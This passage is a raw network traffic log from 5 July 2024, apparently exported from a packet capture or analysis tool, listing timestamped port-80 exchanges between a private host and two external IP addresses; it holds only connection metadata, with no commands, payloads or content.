                                                                Jul 5, 2024 04:23:17.376429081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376440048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376442909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376451969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376466036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376468897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376490116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376498938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376504898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376517057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376527071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376527071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376550913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376620054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376631021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376640081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376650095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376661062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376662016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376667976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376672029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376694918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376739025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376766920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376777887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376787901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376802921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376805067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376812935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376813889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376828909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376837015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376854897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376858950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376869917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376880884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376880884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376888037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376929045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376929045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376938105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376948118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376966953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376976967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376987934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376996994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377000093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377011061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377022982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377070904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377082109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377090931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377115011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377115011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377129078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377130032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377139091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377151012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377152920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377161980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377167940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377175093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377196074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377254963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377266884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377275944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377295017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377300024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377306938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377315044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377317905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377329111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377338886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377338886 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377351999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377363920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377367973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.377377033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.377397060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380001068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380012035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380022049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380076885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380076885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380115032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380127907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380136013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380162001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380176067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380187035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380187988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380199909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380218983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380228996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.380229950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380244970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.380271912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.435317993 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:17.435370922 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.463305950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463318110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463327885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463375092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463381052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463393927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463402987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463407993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463413954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463414907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463439941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463449955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463449955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463485956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463552952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463563919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463573933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463584900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463589907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463596106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463607073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463613033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463635921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463726044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463762045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463804007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463814974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463843107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463854074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463901997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463912010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463921070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463929892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463946104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463948011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463958025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.463972092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.463984013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464005947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464051962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464065075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464073896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464085102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464092016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464098930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464101076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464111090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464122057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464123011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464133024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464147091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464154959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464184999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464212894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464224100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464237928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464246988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.464251995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464260101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.464281082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468569040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468580008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468590021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468600988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468624115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468630075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468642950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468657017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468671083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468679905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468691111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468700886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468730927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468744993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468761921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468772888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468784094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468796015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468797922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468808889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468818903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468823910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468835115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468844891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468848944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468854904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468869925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468903065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468944073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468956947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468966961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468976021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468981981 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468986988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.468997955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.468998909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469024897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469036102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469064951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469075918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469084978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469094992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469110012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469120026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469132900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469137907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469156981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469158888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469167948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469178915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469181061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469189882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469194889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469201088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469206095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469221115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469233036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469243050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469243050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469254971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469269037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469279051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469301939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469314098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469324112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469332933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469343901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469348907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469367027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469388962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469552994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469563961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469574928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469584942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469594955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469602108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469607115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469619036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469624043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469630003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469638109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469661951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469687939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469707966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469723940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469737053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469746113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469749928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469757080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469779968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469790936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469805956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469818115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469840050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469850063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469862938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469875097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469885111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469908953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469932079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.469968081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469979048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.469989061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470000982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470010042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470012903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470027924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470032930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470056057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470078945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470097065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470107079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470125914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470134974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470139027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470144987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470150948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470164061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.470176935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470196962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.470220089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.471009970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471059084 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.471084118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471095085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471124887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.471143007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471153975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471163988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471175909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.471179962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.471200943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.471219063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.551512957 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.551898956 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.554831028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.554884911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.554915905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.554961920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.554976940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.554989100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555006981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555017948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555027962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555031061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555059910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555071115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555130005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555140018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555150032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555175066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555197001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555219889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555229902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555239916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555250883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555282116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555305004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555314064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555324078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555334091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555360079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555370092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555402040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555413008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555422068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555433989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555449963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555466890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555474043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555479050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555490017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555502892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555510998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555522919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555546999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555588007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555598974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555608988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555629969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555648088 CEST4973280192.168.2.485.28.47.30
